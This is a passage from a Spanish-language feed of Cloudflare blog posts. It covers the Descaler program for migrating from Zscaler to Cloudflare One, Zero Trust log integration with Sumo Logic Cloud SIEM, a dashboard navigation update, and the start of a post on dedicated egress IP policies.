            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/aVioJtBFJgD00GSrE44Le/f10a5c7f18a73f71e85a038d98e2c0eb/image3-18.png" />
            
            </figure><p>Cada vez más a menudo escuchamos a los clientes de Zscaler expresar su insatisfacción respecto a cómo deben gestionar múltiples soluciones para lograr sus objetivos, así como acerca de las condiciones comerciales ofrecidas. Cloudflare One ofrece una red más amplia, un único conjunto de soluciones, sin encadenamiento de servicios, que permite la innovación con gran rapidez y, por tanto, proporciona muchas nuevas versiones de los productos y servicios.</p><p>Básicamente, el programa Descaler ayuda a eliminar el riesgo que implica el cambio. Está diseñado para que sea simple y sencillo, con recursos técnicos que garantizan una transición fluida, así como con una consulta estratégica que garantiza que la migración logre los objetivos de tu organización. Los clientes pueden esperar estar en marcha con Cloudflare One en cuestión de semanas, sin interrupción de sus operaciones empresariales.</p>
    <div>
      <h2>¿De qué consta el programa Descaler?</h2>
      <a href="#de-que-consta-el-programa-descaler">
        
      </a>
    </div>
    <p>Personas conocedoras. Un proceso claro. Tecnología que parece magia. Para que cualquier cambio tenga éxito, es esencial disponer de las personas, el proceso y la tecnología adecuados. Por ello, hemos combinado lo mejor de cada uno de estos recursos para ayudar a los clientes a realizar una migración sin dificultades a Cloudflare One.</p><p><a href="https://www.cloudflare.com/es-es/cloudflare-one/">Cloudflare One</a> es nuestra plataforma de perímetro de servicio de acceso seguro (SASE) que combina los servicios de conectividad de red con los servicios de seguridad Zero Trust en una de las redes globales más rápidas, más resilientes y más modulares. La plataforma conecta dinámicamente los usuarios a los recursos empresariales, con controles de seguridad basados en la identidad que se suministran cerca de los usuarios, estén donde estén.</p>
    <div>
      <h3>Elegibilidad</h3>
      <a href="#elegibilidad">
        
      </a>
    </div>
    <p>Pueden participar en el programa las organizaciones empresariales que utilicen productos de seguridad competitivos de Zscaler, como ZIA o ZPA, y que tengan 1000 empleados o más. El programa Descaler se basa en recursos y puntos de contacto con expertos de Cloudflare en dos rutas relacionadas: una orientada al éxito técnico y otra al éxito empresarial.</p>
    <div>
      <h3>Éxito tecnológico</h3>
      <a href="#exito-tecnologico">
        
      </a>
    </div>
    <p>La alegría de los administradores. El programa Descaler incluye las herramientas, el proceso y los socios que necesitas para realizar una migración técnica sin dificultades.</p><p><b>1. Talleres de arquitectura</b>. Nuestros expertos y los tuyos examinarán bajo una nueva perspectiva dónde te encuentras y a dónde necesitas llegar en los próximos dos o tres años para lograr la transformación digital. Esta sesión interactiva con expertos de Cloudflare nos ayudará a centrarnos en las rutas de migración que resulten más lógicas para tu organización y a profundizar en las tecnologías de soporte disponibles para posibilitar una transición a Cloudflare aún más fácil.</p><p>Los resultados de esta inversión mutua de tiempo incluirán un plan de migración personalizado, acceso al conjunto de herramientas de Descaler y a todos los recursos dedicados de Cloudflare para facilitar una migración fluida. Al mismo tiempo, nos centraremos aún más en los objetivos empresariales a corto, medio y largo plazo que facilita la tecnología de red y de seguridad. Comprenderás mejor tu ruta de migración a la plataforma SASE nativa de Internet y, lo que es aún más importante, cómo hacer que los conceptos Zero Trust y SASE sean tangibles para tu empresa.</p><p><b>2. Herramientas de migración técnica</b>. Además de proporcionarte las personas y los procesos para respaldar tu migración, Cloudflare puede ayudarte a utilizar un conjunto de herramientas técnicas y scripts que en solo unos clics exportan automáticamente los ajustes y las configuraciones de tus productos Zscaler ya implementados para la migración a Cloudflare One. Este conjunto de herramientas ahorra infinidad de horas innecesarias desperdiciadas en hacer clic.</p><p>La magia de este flujo es su simplicidad. Adoptando las prácticas recomendadas de extracción, transformación y carga (ETL) y utilizando las llamadas de API compatibles y documentadas a tu cuenta de cliente, el conjunto de soluciones de Descaler exportará tu configuración y tus ajustes actuales de ZIA o ZPA y los transformará para que sean compatibles con Cloudflare One antes de migrar a una nueva cuenta de Cloudflare One.</p><p>Considera, por ejemplo, una aplicación ZPA. El conjunto de soluciones de Descaler comprobará los ajustes existentes correspondientes al nombre de aplicación, el dominio/SNI, las direcciones IP, los puertos y protocolos permitidos y los grupos de usuarios, entre otros, antes de la exportación, transformación e importación en una nueva cuenta de Cloudflare One. En situaciones donde el tiempo es vital, se pueden adoptar rutas de migración de rápida creación de valor. Por ejemplo, en el caso de una migración urgente de ZIA, simplemente se trata de cambiar el DNS para obtener una línea base de protección, desactivando Zscaler y gestionando a continuación el proceso para la implementación de WARP y de una puerta de enlace web segura completa en rápida sucesión.</p><p><b>Primeros pasos con el conjunto de herramientas</b>En primer lugar, te pediremos que crees una nueva clave de API en tu cuenta de ZIA o ZPA. A continuación, el equipo de Cloudflare podrá compartir el conjunto de herramientas para que uno de tus administradores del sistema pueda ejecutarlo localmente, junto con miembros del equipo de Cloudflare como soporte en caso de dudas. Cloudflare nunca necesitará ni te solicitará tu clave de API, solo la salida generada. Cloudflare utilizará a continuación esta salida para transformar y cargar las configuraciones en la nueva cuenta de Cloudflare One suministrada.</p><p>El conjunto de herramientas de Descaler solo realiza solicitudes de API de lectura y listado en tu cuenta de Zscaler. En situaciones donde los sistemas o servicios que deseas migrar no se correspondan uno a uno, el equipo de Cloudflare y nuestros socios autorizados estarán disponibles para ayudarte a que el proceso de migración sea lo más fluido posible.</p><p><b>3. Participación de socios de confianza.</b> La <a href="https://www.cloudflare.com/partners/">red de socios de Cloudflare</a> incluye socios de servicios y de implementación que proporcionan soluciones de seguridad, fiabilidad y rendimiento con una gran variedad de servicios de valor añadido. Nuestros socios tecnológicos ofrecen a los clientes soluciones complementarias del conjunto de soluciones en la nube para la asistencia práctica mediante el teclado, si así se desea. En enero, anunciamos el <a href="/es-es/cloudflare-one-authorized-services-delivery-partner-track-es-es/">programa de socios de prestación de servicios autorizados</a> de Cloudflare One y nos complace poner en contacto a los clientes con socios autorizados que cumplen los altos estándares de prestación de servicios profesionales de Cloudflare.</p><p>A medida que el programa Descaler continúa creciendo, para facilitar aún más el proceso de transición estamos considerando añadir prestaciones adicionales como la formación técnica completa con cursos de certificación de clientes, junto con soporte de servicios profesionales internos y prestaciones de servicios profesionales de socios autorizados. Este es solo el comienzo de los recursos técnicos disponibles para aquellos clientes que deseen realizar el cambio a Cloudflare.</p>
    <div>
      <h3>Componentes empresariales</h3>
      <a href="#componentes-empresariales">
        
      </a>
    </div>
    <p>Para los directivos de alto nivel, no podría estar más claro en lo que respecta a mostrar el valor empresarial tangible y el ahorro de costes que afectan a los resultados de la empresa.</p><ol><li><p><b>Cálculo del rendimiento de la inversión (ROI)</b>. Nos gusta mostrar, no solo explicar el valor de Cloudflare One. Queremos asegurarnos de que los clientes que vayan a realizar cualquier migración reconozcan el impacto empresarial cuantificable que es posible lograr con la adopción de la plataforma Cloudflare One.</p></li><li><p><b>Libérate de los problemas de tu contrato actual.</b> No permitas que tu contrato existente impida tu modernización de la seguridad a largo plazo. En Cloudflare, estamos decididos a lograr que el proceso de migración sea lo más asequible posible. Esto significa herramientas y opciones financieras flexibles para los clientes, para que puedan abandonar rápidamente Zscaler y adoptar Cloudflare sin problemas. Cuando llegue el momento de tu renovación, no te arrepentirás de esta interacción.</p></li><li><p><b>Evaluación del plan de desarrollo Zero Trust</b>. Pasar de cero a Zero Trust significa anticiparse a lo que vendrá, entendiendo perfectamente dónde te encuentras hoy. Para los líderes empresariales, esto significa utilizar recursos como nuestro <a href="https://assets.ctfassets.net/slt3lc6tev37/9jyDLdW3VXPGwChDCCnrx/1f0bca64017a5cfe01a1e4f32d717bd4/Whitepaper_A-Roadmap-to-Zero-Trust-Architecture_Spanish_20220826.pdf">plan de desarrollo Zero Trust</a> multiproveedor para trazar hoy las iniciativas futuras con ayuda de arquitectos, ingenieros y otros líderes empresariales.</p></li></ol><p>Si tus procesos de Internet están completamente congestionados, utiliza el programa Descaler para lograr un flujo más rápido:</p><p>[2] <a href="https://blog.cloudflare.com/network-performance-update-cio-edition">https://blog.cloudflare.com/network-performance-update-cio-edition</a>, SWG = puerta de enlace web segura, RBI = aislamiento remoto del navegador, ZTNA = acceso a la red Zero Trust.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/48LfPu4KlKI1ikNATvSwJd/37b90f5c10ae0fd373fb7db8b86e851e/Cf-vs-Zscaler-1.png" />
            
            </figure>
    <div>
      <h2>Por qué migrar de Zscaler a Cloudflare One simplemente tiene sentido</h2>
      <a href="#por-que-migrar-de-zscaler-a-cloudflare-one-simplemente-tiene-sentido">
        
      </a>
    </div>
    <p>Cada vez más organizaciones prefieren Cloudflare a Zscaler para modernizar la seguridad. Y, cuando lo hacen, suelen mencionar nuestros puntos fuertes en algunos de los principales criterios de evaluación:</p><ol><li><p><b>Experiencia del usuario:</b> los administradores de TI y de seguridad consideran que nuestros servicios son más fáciles de implementar y más sencillos de gestionar. Los usuarios finales se benefician de un <a href="/es-es/network-performance-update-cio-edition-es-es/">rendimiento más rápido en los servicios de seguridad</a>. Mientras que los servicios y las nubes fragmentados de Zscaler añaden complejidad de gestión con el tiempo, Cloudflare ofrece un plano de control único que permite que tu organización siga avanzando rápidamente hacia sus objetivos de seguridad.</p></li><li><p><b>Conectividad:</b> los clientes valoran la fiabilidad y la escalabilidad de nuestra huella de red global más amplia para proteger cualquier tráfico. Además, a diferencia de Zscaler, la red de Cloudflare está diseñada para ejecutar cada uno de los servicios en cada una de las ubicaciones, a fin de garantizar un sistema de protección coherente para los usuarios de todo el mundo.</p></li><li><p><b>Agilidad para el futuro:</b> los clientes reconocen que avanzar hacia estructuras Zero Trust y SASE requiere asociaciones a largo plazo. Para ese proceso, confían en el historial de Cloudflare de rápida innovación. También valoran nuestra arquitectura flexible para adoptar nuevos estándares y tecnologías de seguridad y anticiparse a los acontecimientos.</p></li></ol><p>Estas son solo algunas de las razones por las que las organizaciones eligen Cloudflare. Si deseas descubrir más razones y casos de éxito, te animamos a que eches un vistazo a esta <a href="/es-es/why-cios-select-cloudflare-one-es-es/">reciente publicación del blog.</a></p><p>Si deseas motivar a tus colegas para que aprovechen el programa Descaler, anímales a analizar más comparaciones directas mediante <a href="https://assets.ctfassets.net/slt3lc6tev37/39Oj4AGAxxQinmxYmLPLvg/b3b824ed2388ab29608efbaa77962583/Infographic_Cloudflare-vs-Zscaler_Spanish_20230306.pdf">esta infografía</a> o <a href="https://www.cloudflare.com/es-es/products/zero-trust/cloudflare-vs-zscaler/">nuestro sitio web</a>.</p>
    <div>
      <h2>Cómo empezar</h2>
      <a href="#como-empezar">
        
      </a>
    </div>
    <p>Para participar en el programa Descaler, solo tienes que registrarte mediante el enlace siguiente. A continuación, el equipo de Cloudflare se pondrá en contacto contigo acerca de detalles adicionales del registro. Si nos proporcionas información sobre tus implementaciones actuales de Zscaler, tus desafios presentes y tus objetivos de Zero Trust o SASE para el futuro, podremos avanzar más rápidamente.</p><p>Con el programa Descaler, nos complace ofrecer una ruta clara para que los clientes realicen el cambio a Cloudflare One. Para empezar, <a href="https://www.cloudflare.com/es-es/lp/zscaler-migration/">regístrate aquí</a>.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/45Ef7xPEuPR49YvJpfOhAe/a496b7f0ba97064bf11c95d52c80635a/image2-11.png" />
            
            </figure> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[Descaler]]></category>
            <category><![CDATA[Cloudflare One]]></category>
            <category><![CDATA[Zero Trust]]></category>
            <guid isPermaLink="false">3r2d2x4ACbSgmA5tZvF2Wg</guid>
            <dc:creator>Corey Mahan</dc:creator>
            <dc:creator>AJ Gerstenhaber</dc:creator>
            <dc:creator>Dave Barnett</dc:creator>
        </item>
        <item>
            <title><![CDATA[Incorporación de señales Zero Trust en Sumo Logic para mejorar la información sobre seguridad]]></title>
            <link>https://blog.cloudflare.com/es-es/zero-trust-signals-to-sumo-logic/</link>
            <pubDate>Tue, 14 Mar 2023 13:00:00 GMT</pubDate>
            <description><![CDATA[ Anunciamos la ampliación de la compatibilidad con la normalización y correlación automatizadas de registros Zero Trust para Logpush en la solución Cloud SIEM de Sumo Logic ]]></description>
            <content:encoded><![CDATA[ <p>Una imagen vale más que mil palabras, y lo mismo es aplicable cuando se trata de reunir visualizaciones, tendencias y datos en forma de un panel de control de seguridad listo para usar.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3hVaAd6pJq09fsIs5GU53e/9b7d0ab2abdc7dcb528072566797c9ab/Dashboard_-Quick-Navigation-1.png" />
            
            </figure><p>Hoy, nos complace anunciar la ampliación del soporte para la normalización y la correlación automatizadas de los registros Zero Trust para <a href="https://developers.cloudflare.com/logs/about/">Logpush</a> en la solución <a href="https://www.sumologic.com/solutions/cloud-siem-enterprise/">Cloud SIEM</a> de Sumo Logic. Como <a href="https://www.cloudflare.com/partners/technology-partners/sumo-logic/">socio tecnológico</a> de Cloudflare, Sumo Logic es el pionero en las soluciones Continuous intelligence, una nueva categoría de software que permite a organizaciones de todos los tamaños abordar los desafíos de los datos y las oportunidades que ofrecen la transformación digital, las aplicaciones modernas y la informática en la nube.</p><p>El contenido actualizado de la solución Cloud SIEM de Sumo Logic ayuda a los clientes de Cloudflare a reducir la fatiga de alertas vinculada a los registros Zero Trust y acelera el proceso de clasificación para los analistas de seguridad, al unificar los datos de seguridad y de red en información de gran precisión. Esta nueva funcionalidad complementa la <a href="https://www.sumologic.com/application/cloudflare/">aplicación Cloudflare existente para Sumo Logic</a>, diseñada para ayudar a los equipos informáticos y de seguridad a obtener información, comprender la actividad anómala y trazar mejor las tendencias a partir de los datos de seguridad y de rendimiento de la red a lo largo del tiempo.</p>
    <div>
      <h2>Integraciones más estrechas para proporcionar información Zero Trust</h2>
      <a href="#integraciones-mas-estrechas-para-proporcionar-informacion-zero-trust">
        
      </a>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4v27Z4MHNSnxP9M0Rs8F75/f0ebc2440edf9807d87a0081777f9463/Cloud-SIEM-HUD.png" />
            
            </figure><p>La utilización de Cloudflare Zero Trust ayuda a proteger a los usuarios, los dispositivos y los datos, y, durante este proceso, puede crear un gran volumen de registros. Estos registros son útiles e importantes porque proporcionan toda la información (quién, qué, cuándo y dónde) acerca de cómo se desarrolla una actividad en una organización. Contienen información como por ejemplo a qué sitio web se ha accedido, quién ha iniciado sesión en una aplicación o qué datos se pueden haber compartido desde un servicio SaaS.</p><p>Hasta ahora, nuestras integraciones con Sumo Logic solo permitían la correlación automatizada de señales de seguridad, ya que Cloudflare solo incluía los servicios básicos. Aunque es esencial garantizar la recopilación de los eventos relacionados con la detección de bots y el WAF en toda tu infraestructura, ahora la visibilidad ampliada de los componentes Zero Trust es más importante que nunca, debido al gran auge del trabajo distribuido y a la adopción de las arquitecturas de la infraestructura híbrida y multinube.</p><p>Con los registros Zero Trust ampliados ya disponibles en la solución Cloud SIEM de Sumo Logic, ahora los clientes obtienen un contexto más detallado de la información de seguridad gracias al amplio conjunto de registros de red y de seguridad que generan los productos Cloudflare:</p><ul><li><p><a href="https://www.cloudflare.com/products/zero-trust/gateway/">Cloudflare Gateway</a> (red, DNS, HTTP)</p></li><li><p><a href="https://www.cloudflare.com/products/zero-trust/browser-isolation/">Aislamiento remoto del navegador de Cloudflare</a> (incluido con los registros de Gateway)</p></li><li><p><a href="https://www.cloudflare.com/products/zero-trust/dlp/">Prevención de pérdida de datos de Cloudflare</a> (incluido con los registros de Gateway)</p></li><li><p><a href="https://www.cloudflare.com/products/zero-trust/access/">Cloudflare Access</a> (registros de auditoría de Access)</p></li><li><p><a href="https://www.cloudflare.com/products/zero-trust/casb/">Agente de seguridad de acceso a la nube de Cloudflare</a> (registros de hallazgos)</p></li></ul><blockquote><p>"Como socio de Cloudflare desde hace mucho tiempo, hemos trabajado juntos para ayudar a los clientes a analizar los eventos y las tendencias de sus sitios web y de sus aplicaciones para proporcionar visibilidad de un extremo a otro y mejorar las experiencias digitales. Nos complace ampliar esta asociación para proporcionar información en tiempo real de la postura de seguridad Zero Trust de los clientes mutuos en la solución Cloud SIEM de Sumo Logic".John CoyleVicepresidente de Business Development, Sumo Logic</p></blockquote>
    <div>
      <h3>Cómo empezar</h3>
      <a href="#como-empezar">
        
      </a>
    </div>
    <p>Para beneficiarte del conjunto de integraciones disponibles para los registros de Sumo Logic y Cloudflare mediante Logpush, activa primero Logpush para Sumo Logic, lo que enviará los registros directamente a la plataforma nativa de nube de Sumo Logic. A continuación, instala la aplicación Cloudflare y (para los clientes de la solución Cloud SIEM) activa el reenvío de estos registros a Cloud SIEM para la normalización y la correlación automatizadas de la información de seguridad.</p><p>Ten en cuenta que el servicio Logpush de Cloudflare solo está disponible para los clientes Enterprise. Si te interesa ampliar tu plan, <a href="https://www.cloudflare.com/lp/cio-week-2023-cloudflare-one-contact-us/">ponte en contacto con nosotros aquí</a>.</p><ol><li><p><a href="https://developers.cloudflare.com/logs/get-started/enable-destinations/sumo-logic/"><b>Activación de Logpush para Sumo Logic</b></a>Cloudflare Logpush permite el envío de los registros directamente a Sumo Logic mediante el panel de control de Cloudflare o mediante la API.</p></li><li><p><b>Instalación de </b><a href="https://www.sumologic.com/application/cloudflare/"><b>la aplicación Cloudflare para Sumo Logic</b></a>Localiza e instala la aplicación Cloudflare desde el catálogo de aplicaciones (el enlace se proporciona más arriba). Si quieres ver una vista previa de los paneles de control incluidos con la aplicación antes de instalarla, haz clic en "Preview Dashboards". Una vez instalada, puedes visualizar la información básica en los paneles de control de Cloudflare para todos los servicios principales.</p></li><li><p><b>(Clientes de Cloud SIEM) Reenvío de registros a Cloud SIEM</b>Después de haber realizado los pasos anteriores, activa el analizador actualizado para los registros de Cloudflare <a href="https://help.sumologic.com/docs/integrations/saas-cloud/cloudflare/#prerequisites">añadiendo el campo _parser</a> a tu origen S3 creado al instalar la aplicación Cloudflare.</p></li></ol>
    <div>
      <h3>¿Y ahora qué?</h3>
      <a href="#y-ahora-que">
        
      </a>
    </div>
    <p>Puesto que un número creciente de organizaciones avanzan hacia la adopción de un modelo de seguridad Zero Trust, cada vez es más importante tener visibilidad de todos los aspectos de la red, y los registros desempeñan una función fundamental en este esfuerzo.</p><p>Si tu organización está empezando y no utiliza aún una herramienta como Sumo Logic, puede ser interesante considerar la posibilidad de utilizar <a href="/announcing-logs-engine/">Cloudflare R2 para el almacenamiento de registros</a>. Cloudflare R2 ofrece una solución escalable y rentable para el almacenamiento de registros.</p><p>Nos complace continuar trabajando estrechamente con nuestros socios tecnológicos para ampliar las integraciones existentes y para crear nuevas integraciones a fin de ayudar a los clientes con la adopción de la seguridad Zero Trust.</p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[Logs (ES)]]></category>
            <category><![CDATA[Dashboard]]></category>
            <category><![CDATA[Zero Trust]]></category>
            <category><![CDATA[Sumo Logic (ES)]]></category>
            <category><![CDATA[Guest Post]]></category>
            <guid isPermaLink="false">1LqRHHF3LAkWnMU7gmt639</guid>
            <dc:creator>Corey Mahan</dc:creator>
            <dc:creator>Drew Horn (Guest Author)</dc:creator>
        </item>
        <item>
            <title><![CDATA[Nueva navegación Zero Trust disponible próximamente (y necesitamos tu opinión)]]></title>
            <link>https://blog.cloudflare.com/es-es/zero-trust-navigation/</link>
            <pubDate>Tue, 07 Mar 2023 17:33:02 GMT</pubDate>
            <description><![CDATA[ La navegación en el panel de control Zero Trust se actualizará a nivel visual el 20 de marzo de 2023 ]]></description>
            <content:encoded><![CDATA[ 
    <div>
      <h2>Estamos actualizando la navegación Zero Trust</h2>
      <a href="#estamos-actualizando-la-navegacion-zero-trust">
        
      </a>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4AKiRUBdyzAeGHX05C0rG9/8851eae62bd0d95c0548bdca162cc533/pasted-image-0.png" />
            
            </figure><p>El 20 de marzo de 2023, lanzaremos una navegación actualizada en el panel de control Zero Trust, que ofrecerá a todos nuestros usuarios Zero Trust una experiencia más fluida en Cloudflare en su conjunto. Este cambio te permitirá gestionar más fácilmente tu organización Zero Trust junto con tus servicios de aplicaciones y de red, tus herramientas para desarrolladores y mucho más.</p><p>Como parte de este próximo lanzamiento, observarás estos tres cambios principales:</p>
    <div>
      <h3>Navegación más rápida</h3>
      <a href="#navegacion-mas-rapida">
        
      </a>
    </div>
    <p>En lugar de abrir otra ventana o de escribir una URL, puedes volver al panel de control de Cloudflare con un solo clic.</p>
    <div>
      <h3>Fácil cambio de cuentas</h3>
      <a href="#facil-cambio-de-cuentas">
        
      </a>
    </div>
    <div></div>
<p></p><p>Visualiza las cuentas y cambia de cuenta en la parte superior de tu barra lateral.</p>
    <div>
      <h3>Recursos y soporte</h3>
      <a href="#recursos-y-soporte">
        
      </a>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/13iG3vX7nTkKdEzYa30WrT/231fd3162903b52b9eb69890daae6d7e/Screenshot-2023-03-06-at-3.49.53-PM.png" />
            
            </figure><p>Encuentra enlaces útiles a nuestra Comunidad y documentación para desarrolladores así como a tu equipo de soporte en la parte superior de tu barra de navegación.</p>
    <div>
      <h2>Por qué estamos actualizando la navegación Zero Trust</h2>
      <a href="#por-que-estamos-actualizando-la-navegacion-zero-trust">
        
      </a>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/ysqKoX5yuL9gw3yGuVjGN/beeb360a966b35e5061ba0f04ff3f90f/Screenshot-2023-03-06-at-3.52.10-PM.png" />
            
            </figure><p>En 2020, lanzamos Gateway a nivel general como el primer producto de Cloudflare que no requería un sitio alojado en la infraestructura de Cloudflare. En otras palabras, Gateway no estaba limitado por el modelo específico del sitio del que en aquel entonces dependían la mayoría de los productos de Cloudflare. Al mismo tiempo, también se utilizaba en estrecha relación con Access. Así, el panel de control de <i>Cloudflare for Teams</i> se desarrolló sobre un nuevo modelo, diseñado desde cero, para proporcionar a nuestros clientes un entorno único determinado (consolidado bajo una estructura única) desde donde gestionar sus productos y cuentas de Teams.</p><p>En la actualidad, Zero Trust ha crecido enormemente, tanto en su capacidad como en su alcance. Muchos de nuestros clientes utilizan una combinación de varios productos de Cloudflare, incluidos los productos Cloudflare One y Zero Trust. Nuestro entorno ha crecido, y este cambio en la navegación es un paso hacia la ampliación de nuestra estructura para abarcar toda la presencia de Cloudflare, en rápida expansión.</p>
    <div>
      <h3>Centrados en la experiencia del usuario</h3>
      <a href="#centrados-en-la-experiencia-del-usuario">
        
      </a>
    </div>
    <p>Muchos nos habéis comentado vuestras dificultades a la hora de utilizar varios productos de Cloudflare, incluido Zero Trust. Tu opinión es importante para nosotros. Hemos invertido en desarrollar una experiencia de usuario de primera clase para que tu tiempo con Cloudflare te resulte fácil y agradable. Nuestras mejoras de la experiencia de usuario se basan en tres principios básicos: coherencia, interconectividad y detectabilidad.</p><p>Nuestro objetivo es ofrecer una experiencia de usuario coherente y predecible en todo el ecosistema de Cloudflare, para que nunca tengas ninguna duda acerca de dónde te encuentras en tu recorrido, ya sea realizando tus tareas cotidianas o descubriendo nuevos productos y funciones de vanguardia.</p>
    <div>
      <h2>Qué más</h2>
      <a href="#que-mas">
        
      </a>
    </div>
    <p>Este cambio en la navegación que anunciamos hoy no es la única mejora de la experiencia del usuario que hemos desarrollado. Es posible que hayas observado algunas otras optimizaciones recientemente:</p>
    <div>
      <h3>Experiencia de carga y autorización del usuario</h3>
      <a href="#experiencia-de-carga-y-autorizacion-del-usuario">
        
      </a>
    </div>
    <p>¿Recuerdas los tiempos cuando aparecía constantemente la pantalla de carga? ¿O quizás cuando tu cuenta Zero Trust no coincidía con la que habías iniciado sesión para gestionar, por ejemplo, tu DNS? ¡Eso ya forma parte del pasado! Nuestro equipo ha desarrollado una experiencia de autorización de cuenta y de usuario más inteligente, más rápida y más fluida.</p>
    <div>
      <h3>Nuevas tablas</h3>
      <a href="#nuevas-tablas">
        
      </a>
    </div>
    <p>Las tablas son un elemento esencial cuando se trata de presentar grandes cantidades de datos e información. Las tablas son un elemento común de las interfaces de usuario de Cloudflare. Ahora, Zero Trust utiliza las mismas interfaces de usuario de tablas que verás al gestionar otros productos y funciones.</p>
    <div>
      <h3>Coherencia de las interfaces de usuario</h3>
      <a href="#coherencia-de-las-interfaces-de-usuario">
        
      </a>
    </div>
    <p>Un pequeño cambio en el esquema de color y en el diseño de la página incorpora el panel de control Zero Trust a la misma familia visual que la experiencia de Cloudflare más amplia. Ahora, durante tu recorrido a Zero Trust, queremos que sepas que sigues estando bajo la estructura única de Cloudflare.</p><p>¡Estas mejoras nos complacen tanto como a ti! Y esperamos que las próximas mejoras en la navegación y en las páginas te resulten un buen complemento a los cambios indicados anteriormente.</p>
    <div>
      <h2>¿Y después?</h2>
      <a href="#y-despues">
        
      </a>
    </div>
    <p>La experiencia del usuario de la que hemos hablado hoy contribuye en buena medida a la creación de una interfaz más coherente, fluida y fácil de usar para que tu trabajo en Cloudflare sea lo más fácil y eficiente posible. Sabemos que siempre hay margen para mejorar más (¡ya tenemos en mente una cuantas mejoras importantes!).</p><p>Para asegurarnos de que estamos resolviendo <i>tus</i> problemas más importantes, nos gustaría conocer tu opinión. Considera rellenar una <a href="https://forms.gle/yQxqfyXKCdUKHYep6">breve encuesta</a> para indicarnos qué mejoras de la experiencia del usuario consideras más urgentes y te gustaría ver a continuación.</p> ]]></content:encoded>
            <category><![CDATA[Cloudflare Zero Trust]]></category>
            <category><![CDATA[Noticias de productos]]></category>
            <category><![CDATA[Dashboard]]></category>
            <category><![CDATA[Zero Trust]]></category>
            <category><![CDATA[Seguridad]]></category>
            <guid isPermaLink="false">2AkgqXaL0e5ri9xMIQk1ho</guid>
            <dc:creator>Emily Flannery</dc:creator>
        </item>
        <item>
            <title><![CDATA[Gestiona y controla el uso de las direcciones IP de salida dedicadas con Cloudflare Zero Trust]]></title>
            <link>https://blog.cloudflare.com/es-es/gateway-egress-policies/</link>
            <pubDate>Fri, 03 Feb 2023 14:00:00 GMT</pubDate>
            <description><![CDATA[ Ahora los administradores pueden utilizar las políticas de salida del tráfico de Gateway para determinar qué direcciones IP de salida se utilizan en qué momento ]]></description>
            <content:encoded><![CDATA[ <p>Antes de las reglas Zero Trust basadas en la identidad, algunas aplicaciones SaaS en la red pública confiaban en la dirección IP del usuario de la conexión como un modelo de seguridad. Los usuarios se conectarían desde ubicaciones de oficina conocidas, con rangos de direcciones IP fijas, y la aplicación SaaS comprobaría no solo sus credenciales de inicio de sesión sino también su dirección.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/n2EL5cxGe6DoEC8l0uIfO/4f37f5248a6bdb58b8ac88ab7912f301/image5-1.png" />
            
            </figure><p>Muchos sistemas aún ofrecen este método de segundo factor. Los clientes de Cloudflare One pueden utilizar una dirección IP de salida dedicada con esta finalidad como parte de su transición hacia un modelo Zero Trust. A diferencia de otras soluciones, los clientes que utilizan esta opción no necesitan implementar ninguna estructura propia. Sin embargo, no es necesario que todo el tráfico utilice estas direcciones IP de salida dedicadas.</p><p>Hoy anunciamos políticas que proporcionan a los administradores control sobre cuándo Cloudflare utiliza sus direcciones IP de salida dedicadas. Específicamente, los administradores pueden utilizar una herramienta de creación de reglas en el panel de control de Cloudflare para determinar qué dirección IP de salida se utiliza y cuándo, en función de atributos como la identidad, la aplicación, la dirección IP y la geolocalización. Esta funcionalidad está disponible para cualquier cliente con contrato empresarial que añada direcciones IP de salida dedicadas a su suscripción Zero Trust.</p>
    <div>
      <h3>¿Por qué creamos esto?</h3>
      <a href="#por-que-creamos-esto">
        
      </a>
    </div>
    <p>En el entorno de trabajo híbrido actual, las organizaciones desean experiencias de seguridad y de TI más coherentes para gestionar la salida del tráfico de sus empleados desde las oficinas, los centros de datos y los usuarios de itinerancia. Para proporcionar una experiencia más ágil, muchas organizaciones están adoptando modernos servicios de proxy entregados en la nube como las <a href="https://www.cloudflare.com/es-es/learning/access-management/what-is-a-secure-web-gateway/">puertas de enlace web seguras</a> (SWG) y retirando su compleja amalgama de dispositivos locales.</p><p>Tradicionalmente, estas herramientas heredadas ofrecían la comodidad de permitir crear políticas de lista de permitidos basadas en direcciones IP de origen estáticas. Cuando los usuarios estaban principalmente en una única ubicación, la verificación del tráfico según la ubicación de salida era fácil y suficientemente fiable. Muchas organizaciones quieren o deben mantener este método de validación del tráfico, incluso cuando sus usuarios ya no trabajan desde una única ubicación.</p><p>Hasta ahora, Cloudflare ha respaldado a estas organizaciones proporcionando direcciones IP de salida dedicadas como un complemento a nuestros <a href="https://www.cloudflare.com/es-es/products/zero-trust/">servicios Zero Trust</a> de proxy. A diferencia de las direcciones IP de salida por defecto, estas direcciones IP de salida dedicadas no se comparten con otras cuentas de Gateway y solo se utilizan para la salida del tráfico redireccionado mediante proxy para la cuenta designada.</p><p>Como <a href="/es-es/gateway-dedicated-egress-policies-es-es/">comentamos en una publicación anterior del blog</a>, los clientes ya utilizan las direcciones IP de salida dedicadas de Cloudflare para dejar de usar su VPN. Las utilizan para identificar el tráfico redireccionado mediante proxy de sus usuarios o para añadirlos a listas en proveedores de terceros. Estas organizaciones se benefician de la simplicidad de utilizar aún las direcciones IP fijas conocidas, al mismo tiempo que su tráfico evita los cuellos de botella y los redireccionamientos de los dispositivos locales tradicionales.</p>
    <div>
      <h3>Cuándo utilizar políticas de salida</h3>
      <a href="#cuando-utilizar-politicas-de-salida">
        
      </a>
    </div>
